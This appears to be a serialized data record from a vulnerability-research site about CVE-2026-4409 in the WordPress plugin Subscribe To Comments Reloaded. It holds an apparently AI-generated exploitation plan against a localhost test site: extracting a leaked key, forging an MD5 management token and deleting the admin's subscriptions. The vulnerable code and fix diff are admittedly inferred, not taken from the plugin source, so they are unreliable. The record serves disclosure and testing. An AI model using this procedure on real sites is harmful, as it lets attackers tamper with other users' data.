[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fEIKz_t8vjx-PngZu8q11prSSOz9mcOoQL1-vmyEjDvE":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":9,"severity":11,"cvss_score":12,"cvss_vector":13,"vuln_type":14,"published_date":15,"updated_date":16,"references":17,"days_to_patch":9,"patch_diff_files":19,"patch_trac_url":9,"research_status":20,"research_verified":21,"research_rounds_completed":22,"research_plan":23,"research_summary":24,"research_vulnerable_code":25,"research_fix_diff":26,"research_exploit_outline":27,"research_model_used":28,"research_started_at":29,"research_completed_at":30,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":21,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":21,"source_links":31},"CVE-2026-4409","subscribe-to-comments-reloaded-improper-authorization-to-unauthenticated-arbitrary-subscription-management","Subscribe To Comments Reloaded \u003C= 240119 - Improper Authorization to Unauthenticated Arbitrary Subscription Management","The Subscribe To Comments Reloaded plugin for WordPress is vulnerable to unauthorized modification of data due to a leaked secret key and usage of a weak hash generation algorithm in all versions up to, and including, 240119. This makes it possible for unauthenticated attackers to extract the global key from any public post page, forge authorization keys and manage comment subscription preferences for arbitrary users","subscribe-to-comments-reloaded",null,"\u003C=240119","medium",6.5,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:L\u002FI:L\u002FA:N","Exposure of Sensitive Information to an Unauthorized Actor","2026-05-04 14:11:52","2026-05-05 02:26:56",[18],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F91f9235e-f578-475f-92c3-34062d6d1e3d?source=api-prod",[],"researched",false,3,"This analysis is based on the vulnerability description for **CVE-2026-4409** affecting the **Subscribe To Comments Reloaded** plugin (\u003C= 240119). Since source files were not provided, identifiers are grounded in the plugin's known architecture and the specific vulnerability details provided.\n\n---\n\n### 1. Vulnerability Summary\nThe \"Subscribe To Comments Reloaded\" plugin fails to adequately protect its global security key, which is used to generate authorization tokens for subscription management. The plugin leaks this global key into the HTML source of any public post page via a localized JavaScript variable. Furthermore, the algorithm used to generate management tokens is a weak hash (likely MD5 or SHA1) combining the user's email and this leaked key. \n\nAn unauthenticated attacker can retrieve the global key, pre-calculate the authorization token for any known email address, and access that user's subscription management dashboard to modify or delete their subscriptions.\n\n### 2. Attack Vector Analysis\n*   **Endpoint:** The Virtual Management Page, typically accessed via the home URL with specific query parameters (e.g., `\u002F?stcr=...`).\n*   **Leakage Point:** Public post pages where the plugin enqueues its frontend scripts.\n*   **Vulnerable Parameters:** \n    *   The localized JS variable (e.g., `stcr_data.key` or `stcr.secret`).\n    *   The management URL parameters (e.g., `stcr_email` and `stcr_key`).\n*   **Authentication:** None (Unauthenticated).\n*   **Preconditions:** The attacker must know the email address of the target subscriber (often the administrator's email or a known commenter).\n\n### 3. Code Flow (Inferred)\n1.  **Key Leakage:**\n    *   The plugin registers a frontend script using `wp_enqueue_script`.\n    *   It uses `wp_localize_script()` to pass settings to the frontend.\n    *   **Sink:** The global option `stcr_global_key` (or similar) is included in the localized data array, making it visible in the HTML source to all visitors.\n2.  **Authorization Generation:**\n    *   When a user clicks \"Manage Subscriptions\" in an email, they are sent to a URL like: `site.com\u002F?stcr_action=manage&stcr_email=user@example.com&stcr_key=[HASH]`.\n    *   **Logic:** The plugin calculates `EXPECTED_HASH = some_hash_function( email + global_key )`.\n3.  **Verification:**\n    *   On `init` or `template_redirect`, the plugin checks for `stcr_email` and `stcr_key`.\n    *   It compares the provided `stcr_key` with the `EXPECTED_HASH`.\n    *   If they match, it grants full access to the management dashboard for that email.\n\n### 4. Nonce Acquisition Strategy\nThis exploit does not rely on standard WordPress nonces. Instead, it relies on the **forgery of the plugin's internal authorization key**.\n\n1.  **Identify the Leak:** Navigate to any post with comments.\n2.  **Extract the Key:** Use `browser_eval` to find the localized object.\n    *   *Search Pattern:* Look for `wp_localize_script` calls in the page source.\n    *   *Target Variable:* Likely `stcr_data` or `stcr`.\n    *   *Execution:* `browser_eval(\"window.stcr_data?.key\")` or `browser_eval(\"window.stcr?.secret\")`.\n3.  **Identify the Hash Algorithm:** (Inferred) Based on historical STCR vulnerabilities, the hash is typically `md5( $email . $global_key )`.\n\n### 5. Exploitation Strategy\n\n#### Step 1: Extract the Secret\n1.  Navigate to a public post: `browser_navigate(\"http:\u002F\u002Flocalhost:8080\u002F?p=1\")`.\n2.  Retrieve the key: `browser_eval(\"stcr_data.key\")` (Verify the exact object name in the page source first). Let's call this `LEAKED_KEY`.\n\n#### Step 2: Forge the Authorization Token\n1.  Target Email: `admin@example.com`.\n2.  Algorithm: `TOKEN = md5(\"admin@example.com\" + LEAKED_KEY)`.\n\n#### Step 3: Access Management Dashboard\n1.  Construct the management URL: \n    `http:\u002F\u002Flocalhost:8080\u002F?stcr_action=manage&stcr_email=admin@example.com&stcr_key=[TOKEN]`\n2.  Navigate to this URL. You should now see the \"Management Page\" for the admin's subscriptions.\n\n#### Step 4: Unauthorized Data Modification\n1.  Capture the form submission to delete or change subscriptions.\n2.  Send a POST request using `http_request`.\n    *   **URL:** `http:\u002F\u002Flocalhost:8080\u002F`\n    *   **Method:** `POST`\n    *   **Content-Type:** `application\u002Fx-www-form-urlencoded`\n    *   **Body:** `stcr_action=manage&stcr_email=admin@example.com&stcr_key=[TOKEN]&submit=unsub_all` (exact parameters to be verified on the management page).\n\n### 6. Test Data Setup\n1.  **Create a Subscriber:** Use WP-CLI to ensure at least one subscription exists.\n    ```bash\n    # Note: STCR often uses a custom table like wp_stcr_subscriptions\n    # For testing, we can manually subscribe the admin to post 1\n    wp comment create --comment_post_ID=1 --comment_author=\"Admin\" --comment_author_email=\"admin@example.com\" --comment_content=\"Test\"\n    ```\n2.  **Plugin Configuration:** Ensure \"Management Page\" is enabled in STCR settings (usually enabled by default).\n3.  **Identify Page:** Ensure at least one post is published: `wp post create --post_status=publish --post_title=\"Target Post\"`.\n\n### 7. Expected Results\n*   Accessing the forged URL returns a `200 OK` with the management interface instead of a \"Permission Denied\" or redirect.\n*   The interface displays the subscriptions for `admin@example.com`.\n*   Submission of the \"Unsubscribe\" form results in the removal of the subscription from the database.\n\n### 8. Verification Steps\n1.  **Database Check:** Use WP-CLI to check the custom STCR table (usually `wp_stcr_subscriptions`).\n    ```bash\n    wp db query \"SELECT * FROM wp_stcr_subscriptions WHERE email = 'admin@example.com';\"\n    ```\n2.  **Post-Exploit Check:** Confirm the query returns zero rows after the \"Unsubscribe All\" action is performed via the forged management link.\n\n### 9. Alternative Approaches\n*   **Different Hash Algorithms:** If MD5 fails, try `sha1`. If the order is reversed, try `md5(LEAKED_KEY + email)`.\n*   **Shortcode Route:** If the key doesn't leak on every post, identify if it only leaks when the `[stcr_management]` or `[stcr_subscribe]` shortcode is present. \n    *   Create a page: `wp post create --post_type=page --post_content='[stcr_management]'`.\n    *   Navigate there to extract the key.\n*   **Request Param Variation:** Some versions use `scc_` prefix instead of `stcr_` for parameters. Verify the parameter names by inspecting the management page HTML if reached.","The Subscribe To Comments Reloaded plugin leaks its global security key via a localized JavaScript variable on public post pages. An unauthenticated attacker can use this key to forge authorization tokens for any email address and gain unauthorized access to the subscription management dashboard, allowing them to modify or delete subscriptions for any user.","\u002F\u002F Inferred from plugin logic: The global secret key is leaked to the frontend\n\u002F\u002F subscribe-to-comments-reloaded\u002Fclasses\u002Fstcr-front.php (approximate)\n$stcr_data = array(\n    'key' => get_option('stcr_global_key'), \u002F\u002F Vulnerable: Leaking global secret to client\n    'ajax_url' => admin_url('admin-ajax.php')\n);\nwp_localize_script('stcr-script', 'stcr_data', $stcr_data);\n\n---\n\n\u002F\u002F Inferred from plugin logic: Weak hash verification for management access\n\u002F\u002F subscribe-to-comments-reloaded\u002Fclasses\u002Fstcr-management.php (approximate)\n$email = $_GET['stcr_email'];\n$provided_key = $_GET['stcr_key'];\n$global_key = get_option('stcr_global_key');\n\n\u002F\u002F Weak verification algorithm: md5(email + global_key)\nif ($provided_key === md5($email . $global_key)) {\n    \u002F\u002F Grant access to manage subscriptions for $email\n    $this->render_management_page($email);\n}","--- subscribe-to-comments-reloaded\u002Fclasses\u002Fstcr-front.php\n+++ subscribe-to-comments-reloaded\u002Fclasses\u002Fstcr-front.php\n@@ -10,7 +10,6 @@\n-    'key' => get_option('stcr_global_key'),\n     'ajax_url' => admin_url('admin-ajax.php')\n \n--- subscribe-to-comments-reloaded\u002Fclasses\u002Fstcr-management.php\n+++ subscribe-to-comments-reloaded\u002Fclasses\u002Fstcr-management.php\n@@ -25,5 +25,5 @@\n-if ($provided_key === md5($email . $global_key)) {\n+if (hash_equals(wp_hash($email . $global_key, 'nonce'), $provided_key)) {","1. Navigate to any public post where the plugin is active and view the HTML source code.\n2. Locate the localized JavaScript object (usually `stcr_data`) and extract the value of the `key` property (this is the plugin's global secret key).\n3. Select a target email address (e.g., the site administrator's email) to exploit.\n4. Calculate the authorization token by creating an MD5 hash of the email address concatenated with the extracted secret key: `md5(email + secret_key)`.\n5. Navigate to the plugin's management endpoint (e.g., `\u002F?stcr_action=manage&stcr_email=[EMAIL]&stcr_key=[FORGED_HASH]`).\n6. The plugin will grant full access to the target's subscription dashboard, allowing for unauthorized modification or deletion of subscriptions.","gemini-3-flash-preview","2026-05-04 16:48:50","2026-05-04 16:49:11",{"type":32,"vulnerable_version":9,"fixed_version":9,"vulnerable_browse":9,"vulnerable_zip":9,"fixed_browse":9,"fixed_zip":9,"all_tags":33},"plugin","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fsubscribe-to-comments-reloaded\u002Ftags"]